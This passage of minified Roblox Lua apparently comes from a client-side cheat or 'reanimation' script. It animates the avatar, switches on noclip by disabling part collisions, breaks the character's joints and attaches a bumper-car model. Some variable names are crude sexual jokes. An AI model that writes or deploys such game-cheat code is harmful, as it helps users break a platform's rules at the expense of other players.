ut",0.075)SetTween(LH,{C0=cn(-.5,-0.35+.05*math.cos(dQ/15),-.4)*CFrame.Angles(math.rad(-25+1*math.cos(dQ/10)),math.rad(0),math.rad(0))},"Quad","InOut",0.075)elseif N=="Fall"then dR=0.60*2;SetTween(hI,{C0=RootCF*cn(0,0+0.0395/2*math.cos(dQ/8),-0.5+0.0395*math.cos(dQ/8))*angles(math.rad(5.5-1.5*math.cos(dQ/8))-dO*dU/2,math.rad(0)+dO*dV/2,math.rad(0))},"Quad","Out",0.35)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(26.5+2.5*math.cos(dQ/8)),math.rad(0),math.rad(-0))},"Quad","Out",0.25)SetTween(RW,{C0=cn(1.4+.05*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(105-dU*60),math.rad(25),math.rad(30+4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(LW,{C0=cn(-1.4+.05*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(105-dU*60),math.rad(-25),math.rad(-30-4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(RH,{C0=cn(.5,-0.15+.05*math.cos(dQ/15),-.4)*CFrame.Angles(math.rad(-15-1*math.cos(dQ/10)),math.rad(0),math.rad(0))},"Quad","InOut",0.1)SetTween(LH,{C0=cn(-.5,-0.55+.05*math.cos(dQ/15),-.4)*CFrame.Angles(math.rad(-0+1*math.cos(dQ/10)),math.rad(0),math.rad(0))},"Quad","InOut",0.1)elseif N=="Idle"then local f2=1;if not mememode==true then dR=0.60*2*f2;Humanoid.JumpPower=60;Humanoid.WalkSpeed=16;local i0=0;SetTween(hI,{C0=RootCF*cn(0,0,-0.1+0.0395*math.cos(dQ/8+i0*math.cos(dQ/8*2)))*angles(math.rad(0-0*math.cos(dQ/8)),math.rad(0+0*math.cos(dQ/8)/20),math.rad(-20))},"Quad","InOut",0.1)if broseph==false then SetTween(hJ,{C0=NeckCF*angles(math.rad(0-1.5*math.cos(dQ/8+i0*math.cos(dQ/8*2))),math.rad(2.5-5.5*math.cos(dQ/16)),math.rad(20-6.5*math.cos(dQ/15+.4*math.cos(dQ/10))))},"Quad","InOut",0.1)end;SetTween(RW,{C0=cn(1.45+.0*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(0-2*math.cos(dQ/8)),math.rad(-5),math.rad(8+4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(LW,{C0=cn(-1.45+.0*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(0-2*math.cos(dQ/8)),math.rad(5),math.rad(-8-4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(RH,{C0=cn(.5,-0.95-.04*math.cos(dQ/8+i0*math.cos(dQ/8*2)),0)*CFrame.Angles(math.rad(1.5-0*math.cos(dQ/8)),math.rad(0),math.rad(2.5-0.0*math.cos(dQ/8)))},"Quad","InOut",0.1)SetTween(LH,{C0=cn(-.5,-0.95-.04*math.cos(dQ/8+i0*math.cos(dQ/8*2)),0)*CFrame.Angles(math.rad(1.5-0*math.cos(dQ/8)),math.rad(20),math.rad(-2.5-0.0*math.cos(dQ/8)))},"Quad","InOut",0.1)else f2=2;dR=0.60*1*f2;Humanoid.JumpPower=60;Humanoid.WalkSpeed=16;SetTween(hI,{C0=RootCF*cn(0,0,3+1*math.sin(dQ/8))*angles(math.rad(10+5*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.1)if broseph==false then SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-10+5*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.1)end;SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(10+10*math.sin(dQ/8)),math.rad(5),math.rad(30-10*math.sin(dQ/8)))},"Quad","Out",0.1)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(10+10*math.sin(dQ/8)),math.rad(-5),math.rad(-30+10*math.sin(dQ/8)))},"Quad","Out",0.1)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(-10+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.1)SetTween(LH,{C0=cn(-.5,-.5,-.3)*angles(math.rad(20+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.1)end elseif N=="Walk"then local speed=1.6;if not mememode==true and not feral==true then dR=2.6*speed;Humanoid.JumpPower=60;Humanoid.WalkSpeed=22*speed*PSize;local i1=cn(-dV/7*math.cos(dQ/8),0,dU/7*math.cos(dQ/8))*angles(math.sin(-dU)*math.cos(dQ/8),0,math.sin(-dV)*math.cos(dQ/8))local i2=cn(dV/7*math.cos(dQ/8),0,-dU/7*math.cos(dQ/8))*angles(math.sin(dU)*math.cos(dQ/8),0,math.sin(dV)*math.cos(dQ/8))SetTween(hI,{C0=RootCF*cn(dV/2*math.sin(dQ/4),-dU/2*math.sin(dQ/4),-0.09+0.40*math.cos(dQ/4)+-math.sin(dQ/4)/8)*angles(math.rad((dU*2-dU*math.cos(dQ/4))*10),math.rad((-dV- -dV*math.cos(dQ/4))*5),math.rad(4*math.cos(dQ/8)))},"Linear","InOut",WalkAnimMove/speed)if broseph==false then SetTween(hJ,{C0=NeckCF*cn(0,0,0+0.025*math.cos(dQ/4))*angles(math.rad((-dU*2- -dU*math.cos(dQ/4))*8),math.rad((dV*2-dV*math.cos(dQ/4))*5),math.rad(-dV*45+-4*math.cos(dQ/8)))},"Linear","InOut",WalkAnimMove/speed)end;SetTween(RW,{C0=cn(1.45+.0*math.cos(dQ/8),0.5+dV/50*math.cos(dQ/8),0)*angles(math.rad(0+dU*55*math.cos(dQ/8)),math.rad(0),math.rad(8+dV*5*math.cos(dQ/8)))},"Quad","Out",WalkAnimMove/speed)SetTween(LW,{C0=cn(-1.45+.0*math.cos(dQ/8),0.5+dV/50*math.cos(dQ/8),0)*angles(math.rad(0-dU*55*math.cos(dQ/8)),math.rad(0),math.rad(-8-dV*5*math.cos(dQ/8)))},"Quad","Out",WalkAnimMove/speed)SetTween(RH,{C0=cn(.5,-0.75+.35*math.sin(dQ/8),-.15+.15*math.cos(dQ/8))*i1*CFrame.Angles(math.rad(0-5*math.cos(dQ/8)),math.rad(0),math.rad(2.5-0.0*math.cos(dQ/8)))},"Quad","InOut",WalkAnimMove/speed)SetTween(LH,{C0=cn(-.5,-0.75-.35*math.sin(dQ/8),-.15-.15*math.cos(dQ/8))*i2*CFrame.Angles(math.rad(0+5*math.cos(dQ/8)),math.rad(0),math.rad(-2.5-0.0*math.cos(dQ/8)))},"Quad","InOut",WalkAnimMove/speed)else if mememode==true and feral==false then speed=2;dR=1.6*speed;Humanoid.JumpPower=60*speed;Humanoid.WalkSpeed=22*speed*PSize;SetTween(hI,{C0=RootCF*cn(0,0,3+.5*math.sin(dQ/8))*angles(math.rad(30*dU+5*math.cos(dQ/8)),math.rad(-25*dV),math.rad(0))},"Quad","InOut",0.1)if broseph==false then SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-10+5*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.1)end;SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(-45*dU+10*math.sin(dQ/8)+25*dV),math.rad(5),math.rad(10-10*dU*math.sin(dQ/8)-25*dV))},"Quad","Out",0.1)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(-45*dU+10*math.sin(dQ/8)-25*dV),math.rad(-5),math.rad(-10+10*dU*math.sin(dQ/8)-25*dV))},"Quad","Out",0.1)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(-30*dU+15*math.cos(dQ/8)),math.rad(0),math.rad(-25*dV))},"Quad","InOut",0.1)SetTween(LH,{C0=cn(-.5,-.75+.25*dU,-.15-.15*dU)*angles(math.rad(-10*dU+15*math.cos(dQ/8)),math.rad(0),math.rad(-25*dV))},"Quad","InOut",0.1)else if feral==true and mememode==false then dR=3*speed;Humanoid.JumpPower=60;Humanoid.WalkSpeed=30*speed*PSize;local i1=cf(-dV/7*math.cos(dQ/8),0,dU/7*math.cos(dQ/8))*angles(math.rad(dU*89)*math.cos(dQ/8),mr(-dV*55/2*math.cos(dQ/8)),math.rad(dV*55/1*math.cos(dQ/8)))local i2=cf(dV/7*math.sin(dQ/8),0,-dU/7*math.cos(dQ/8))*angles(math.rad(dU*89)*math.cos(dQ/8),mr(dV*55/2*math.sin(dQ/8)),math.rad(-dV*55/1*math.sin(dQ/8)))SetTween(hI,{C0=RootCF*CFrame.new(dV*1*math.sin(dQ/8),dU*1*math.sin(dQ/8),-0.5-0.255*math.cos(dQ/8)+-math.sin(dQ/8)/8)*angles(math.rad(85+dU*math.cos(dQ/8)*20),math.rad(-dV*math.cos(dQ/4)*1),math.rad(-dV*math.cos(dQ/8)*10))},"Linear","InOut",WalkAnimMove/speed)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0+0.025*math.cos(dQ/4))*angles(math.rad(-20+(-dU*1- -dU*math.cos(dQ/4))*5),math.rad((dV*2-dV*math.cos(dQ/4))*3.5),math.rad(-dV*45+-8*math.cos(dQ/8)))},"Linear","InOut",WalkAnimMove/speed)SetTween(RW,{C0=cf(0.5+.0*math.cos(dQ/8),.5-dU*0.5*math.sin(dQ/8),-.4)*angles(math.rad(95-dU*75*math.sin(dQ/8)),math.rad(0),math.rad(-8+-dV*55*math.sin(dQ/8)+10*math.cos(dQ/8)))},"Linear","Out",WalkAnimMove/speed)SetTween(LW,{C0=cf(-0.5+.0*math.cos(dQ/8),.5-dU*0.5*math.sin(dQ/8),-.4)*angles(math.rad(95-dU*75*math.sin(dQ/8)),math.rad(0),math.rad(8+dV*55*math.cos(dQ/8)-10*math.cos(dQ/8)))},"Linear","Out",WalkAnimMove/speed)SetTween(RH,{C0=CFrame.new(.25,-0.425-.25*math.sin(dQ/8),-.15-.25*math.sin(dQ/8))*i1*CFrame.Angles(math.rad(60-5*math.cos(dQ/8)),math.rad(0),math.rad(-2.5-0.0*math.cos(dQ/8)))},"Linear","InOut",WalkAnimMove/speed)SetTween(LH,{C0=CFrame.new(-.25,-0.425-.25*math.sin(dQ/8),-.15-.25*math.sin(dQ/8))*i2*CFrame.Angles(math.rad(60-5*math.sin(dQ/8)),math.rad(0),math.rad(2.5-0.0*math.sin(dQ/8)))},"Linear","InOut",WalkAnimMove/speed)end end end elseif N=="Sit"then SetTween(hI,{C0=RootCF*cn(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Quad","InOut",0.1)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Quad","InOut",0.1)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Quad","Out",0.1)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Quad","Out",0.1)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(90),math.rad(0),math.rad(0))},"Quad","InOut",0.1)SetTween(LH,{C0=cn(-.5,-1,0)*angles(math.rad(90),math.rad(0),math.rad(0))},"Quad","InOut",0.1)end end;Swait(Animstep*30)end end))end)end;function Clickey6()pcall(function()local i3=false;local function i4()if i3==false and game:GetService("Players").LocalPlayer.Character~=nil then for U,i5 in pairs(game:GetService("Players").LocalPlayer.Character:GetDescendants())do if i5:IsA("BasePart")and i5.CanCollide==true then i5.CanCollide=false end end end end;Noclipping=game:GetService('RunService').Stepped:connect(i4)local RA=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Right Arm")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("RightUpperArm")local LA=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Left Arm")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("LeftUpperArm")local RL=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Right Leg")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("RightUpperLeg")local LL=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Left Leg")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("LeftUpperLeg")local i6=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Torso")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("UpperTorso")if workspace[game:GetService("Players").LocalPlayer.Name].Humanoid.RigType==Enum.HumanoidRigType.R15 then workspace[game:GetService("Players").LocalPlayer.Name].RightUpperArm["RightShoulder"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].LeftUpperArm["LeftShoulder"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].LeftUpperLeg["LeftHip"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].RightUpperLeg["RightHip"]:Destroy()else workspace[game:GetService("Players").LocalPlayer.Name].Torso["Right Shoulder"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].Torso["Left Shoulder"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].Torso["Right Hip"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].Torso["Left Hip"]:Destroy()end;local i7=game:GetObjects("rbxassetid://5508993607")[1]i7.Parent=workspace[game:GetService("Players").LocalPlayer.Name]i7.Name="BIGBOI"alignPosition=Instance.new("AlignPosition",RA)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",RA)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;alignPosition=Instance.new("AlignPosition",LA)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",LA)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;alignPosition=Instance.new("AlignPosition",LL)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",LL)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;alignPosition=Instance.new("AlignPosition",RL)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",RL)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;alignPosition=Instance.new("AlignPosition",i6)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",i6)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;a0=Instance.new("Attachment",RA)a1=Instance.new("Attachment",i7["Right Arm"])a2=Instance.new("Attachment",RA)RA.AlignPosition.Attachment0=a0;RA.AlignPosition.Attachment1=a1;RA.AlignOrientation.Attachment0=a2;RA.AlignOrientation.Attachment1=a1;a0=Instance.new("Attachment",LA)a1=Instance.new("Attachment",i7["Left Arm"])a2=Instance.new("Attachment",LA)LA.AlignPosition.Attachment0=a0;LA.AlignPosition.Attachment1=a1;LA.AlignOrientation.Attachment0=a2;LA.AlignOrientation.Attachment1=a1;a0=Instance.new("Attachment",RL)a1=Instance.new("Attachment",i7["Right Leg"])a2=Instance.new("Attachment",RL)RL.AlignPosition.Attachment0=a0;RL.AlignPosition.Attachment1=a1;RL.AlignOrientation.Attachment0=a2;RL.AlignOrientation.Attachment1=a1;a0=Instance.new("Attachment",LL)a1=Instance.new("Attachment",i7["Left Leg"])a2=Instance.new("Attachment",LL)LL.AlignPosition.Attachment0=a0;LL.AlignPosition.Attachment1=a1;LL.AlignOrientation.Attachment0=a2;LL.AlignOrientation.Attachment1=a1;a0=Instance.new("Attachment",i6)a1=Instance.new("Attachment",i7["Torso"])a2=Instance.new("Attachment",i6)i6.AlignPosition.Attachment0=a0;i6.AlignPosition.Attachment1=a1;i6.AlignOrientation.Attachment0=a2;i6.AlignOrientation.Attachment1=a1;RA.CFrame=CFrame.Angles(0,0,0)LA.CFrame=CFrame.Angles(0,0,0)i6.CFrame=CFrame.Angles(0,0,0)RL.CFrame=CFrame.Angles(0,0,0)LL.CFrame=CFrame.Angles(0,0,0)i7["Right Arm"].CFrame=CFrame.Angles(0,0,0)i7["Left Arm"].CFrame=CFrame.Angles(0,0,0)i7["Torso"].CFrame=CFrame.Angles(0,0,0)i7["Right Leg"].CFrame=CFrame.Angles(0,0,0)i7["Left Leg"].CFrame=CFrame.Angles(0,0,0)i7.HumanoidRootPart.Anchored=false;game:GetService("Workspace").CurrentCamera.CameraSubject=workspace[game:GetService("Players").LocalPlayer.Name].BIGBOI.Humanoid;spawn(function()while true do wait()if workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Humanoid").Health==0 then workspace[game:GetService("Players").LocalPlayer.Name]:BreakJoints()i7:BreakJoints()end end end)function nocol(i8)for T,v in pairs(workspace[game:GetService("Players").LocalPlayer.Name]:GetDescendants())do if v:IsA("BasePart")then HILOL=Instance.new("NoCollisionConstraint",v)HILOL.Part0=v;HILOL.Part1=i8 end end end;for T,v in pairs(i7:GetDescendants())do if v:IsA("BasePart")then nocol(v)end end;game:GetService("Workspace").CurrentCamera.CameraSubject=i7.Humanoid;RA.Anchored=true;i6.Anchored=true;LA.Anchored=true;RL.Anchored=true;LL.Anchored=true;workspace[game:GetService("Players").LocalPlayer.Name].Head.Anchored=true;game:GetService("Workspace").CurrentCamera.CameraSubject=workspace[game:GetService("Players").LocalPlayer.Name].BIGBOI.Humanoid;game:GetService("Players").LocalPlayer.Character.Animate.Disabled=true;i7:MoveTo(game:GetService("Players").LocalPlayer.Character.Head.Position)game:GetService("UserInputService").JumpRequest:connect(function(i8)if i7.Humanoid.FloorMaterial~=Enum.Material.Air then i7.Humanoid.Jump=true end end)game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Anchored=true;if workspace[game:GetService("Players").LocalPlayer.Name].Humanoid.RigType==Enum.HumanoidRigType.R6 then workspace[game:GetService("Players").LocalPlayer.Name].HumanoidRootPart.RootJoint:Destroy()elseif workspace[game:GetService("Players").LocalPlayer.Name].Humanoid.RigType==Enum.HumanoidRigType.R15 then workspace[game:GetService("Players").LocalPlayer.Name].LowerTorso.Root:Destroy()end;Humanoid=game:GetService("Players").LocalPlayer.Character.Humanoid;game:GetService("RunService").RenderStepped:Connect(function()i7.Humanoid:Move(workspace[game:GetService("Players").LocalPlayer.Name].Humanoid.MoveDirection,false)end)spawn(function()local i9=Humanoid:GetPlayingAnimationTracks()for U,v in pairs(i9)do v:Stop()end end)RA.Anchored=false;i6.Anchored=false;LA.Anchored=false;RL.Anchored=false;LL.Anchored=false;workspace[game:GetService("Players").LocalPlayer.Name].Head.Anchored=false;local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;broski=-1.6;cum=-45;cockand=20;balltorture=-20;bruhmomento=0;local R={car=Character:WaitForChild("MeshPartAccessory")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()end;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=2500;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=2500 end;maincolor=game:GetService("Players").LocalPlayer.Character.Torso.BrickColor.Name;secondcolor="Really black"game["Run Service"].Stepped:connect(function()game:GetService("Players").LocalPlayer.Character.Torso.CanCollide=false;game:GetService("Players").LocalPlayer.Character.Head.CanCollide=false end)wait(1/60)Effects={}local Player=game:GetService("Players").localPlayer;local Character=Player.Character.BIGBOI;local Humanoid=Character.Humanoid;local mouse=Player:GetMouse()local LeftArm=Character["Left Arm"]local RightArm=Character["Right Arm"]local LeftLeg=Character["Left Leg"]local RightLeg=Character["Right Leg"]local Head=Character.Head;local Torso=Character.Torso;local cam=game:GetService("Workspace").CurrentCamera;local RootPart=Character.HumanoidRootPart;local RootJoint=RootPart.RootJoint;local ia=true;local dS=false;local N='Idle'local ib=0;local ic=1;local id=(RootPart.Velocity*Vector3.new(1,0,1)).magnitude;local ie=RootPart.Velocity.y;local dQ=0;local dR=1;local grabbed=false;local cn=CFrame.new;local mr=math.rad;local angles=CFrame.Angles;local ig=UDim2.new;local c3=Color3.new;local ih={w=0,s=0,a=0,d=0}Climbanim=false;Runkey=false;firemode=false;inair=false;blocking=false;humHsave=0;humDsave=0;extralock=true;lasthit=nil;IKM=false;HMDX=Humanoid.MoveDirection.X/3;HMDZ=Humanoid.MoveDirection.Z/3;local s=Instance.new("Sound",Character)s.Name="BumperCarSound"s.SoundId="http://www.roblox.com/asset/?id=532147820"s.Pitch=.7;s.Volume=.5;s.Looped=true;s.archivable=false;s.Parent=Character;s:play()sflon=true;game:GetService("RunService"):BindToRenderStep("ew",0,function()if dS==true then bg2.D=0;bg2.P=0;bg2.maxTorque=Vector3.new(0,0,0)end;if dS==false then bg2.D=100;bg2.P=9999;bg2.maxTorque=Vector3.new(1e+005,1e+000,1e+005)*math.huge;bg2.CFrame=CFrame.new(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position,Vector3.new(game:GetService("Workspace").CurrentCamera.CoordinateFrame.p.x,game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position.y,game:GetService("Workspace").CurrentCamera.CoordinateFrame.p.z))*CFrame.Angles(0,math.rad(180),0)end end)New=function(j,ed,ei,fe)local j=Instance.new(j)for ff,fg in pairs(fe or{})do j[ff]=fg end;j.Parent=ed;j.Name=ei;return j end;BumperCar=New("Model",Workspace,"BumperCar",{})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.099999845,0.199999988,0.299999952),CFrame=CFrame.new(-5.95999956,9.90000057,-36.2131157,1,7.64274186e-15,0,7.64274186e-15,-1,-8.74227766e-08,0,8.74227766e-08,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Part=New("Part",BumperCar,"Part1",{BrickColor=BrickColor.new("Really black"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(1.5,0.100000001,0.100000001),CFrame=CFrame.new(-4.02177143,11.8595181,-40.6349945,-0.466506243,-0.129409313,0.87500006,-0.741025686,-0.482962549,-0.466506183,0.482962519,-0.866025567,0.129409432),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.0666667,0.0666667,0.0666667)})Part=New("Part",BumperCar,"Part2",{BrickColor=BrickColor.new("Dark stone grey"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(0.099999994,3.9000001,3.9000001),CFrame=CFrame.new(-5.16500664,8.05000019,-38.9131165,-4.37113883e-08,-1,0,1,-4.37113883e-08,0,0,0,0.999999821),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.388235,0.372549,0.384314)})Part=New("Part",BumperCar,"Part3",{BrickColor=BrickColor.new("Black"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(2.79999995,0.800000072,0.800000072),CFrame=CFrame.new(-5.81500626,8.5,-34.7631149,-2.08616257e-07,0,1,0,1,0,-1,0,-2.08616257e-07),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.105882,0.164706,0.207843)})SwHandle=New("Part",BumperCar,"Handle",{BrickColor=BrickColor.new("Really black"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(4,0.899999976,4),CFrame=CFrame.new(-5.16500664,7.55000019,-36.9631157,1,0,0,0,1,0,0,0,1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.0666667,0.0666667,0.0666667)})Part=New("Part",BumperCar,"Part4",{BrickColor=BrickColor.new("Olive"),Material=Enum.Material.Neon,Shape=Enum.PartType.Cylinder,Size=Vector3.new(0.099999845,0.699999988,0.699999988),CFrame=CFrame.new(-5.81500578,8.5,-33.4031143,-2.08616257e-07,0,1,0,1,0,-1,0,-2.08616257e-07),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.756863,0.745098,0.258824)})Part=New("Part",BumperCar,"Part5",{BrickColor=BrickColor.new("Really black"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(0.899999976,4,4),CFrame=CFrame.new(-5.16500664,7.55000019,-34.9631157,-4.37113883e-08,-1,0,1,-4.37113883e-08,0,0,0,0.999999821),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.0666667,0.0666667,0.0666667)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Black"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.799999952,0.599999964,1.49999952),CFrame=CFrame.new(-6.46000004,8.85000038,-39.5131149,4.37113883e-08,-1,-1.19248771e-08,8.74227695e-08,1.19248798e-08,-0.99999994,1,4.37113883e-08,8.74227766e-08),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.105882,0.164706,0.207843)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.099999845,1,0.299999952),CFrame=CFrame.new(-4.35999966,9.60000038,-36.2131157,-1,0,-8.74227766e-08,0,1,0,8.74227766e-08,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.199999958,1,0.999999523),CFrame=CFrame.new(-3.50999951,8.60000038,-36.8631134,1,0,1.74845553e-07,0,1,0,-1.74845553e-07,0,1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Part=New("Part",BumperCar,"Part6",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Shape=Enum.PartType.Cylinder,Size=Vector3.new(2.89999986,1.99999988,1.99999988),CFrame=CFrame.new(-5.15999985,8.5,-34.9000015,-2.08616257e-07,0,1,0,1,0,-1,0,-2.08616257e-07),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,TopSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(1.49999976,0.0999999866,0.109999947),CFrame=CFrame.new(-5.15999985,9.95000076,-36.4081154,-1,-1.52854837e-14,8.74227766e-08,7.64274186e-15,-1,-8.74227766e-08,8.74227766e-08,-8.74227766e-08,1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.199999958,1,0.999999523),CFrame=CFrame.new(-6.80999947,8.60000038,-36.8631134,1,0,1.74845553e-07,0,1,0,-1.74845553e-07,0,1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=Color3.new(0.458824,0,0)})Wedge=New("WedgePart",BumperCar,"Wedge",{BrickColor=BrickColor.new("Maroon"),Material=Enum.Material.SmoothPlastic,Size=Vector3.new(0.200000048,1.60000002,0.999999523),CFrame=CFrame.new(-6.80999947,8.90000057,-38.5631142,-1,0,-8.74227766e-08,0,1,0,8.74227766e-08,0,-1),Anchored=true,BottomSurface=Enum.SurfaceType.Smooth,Color=C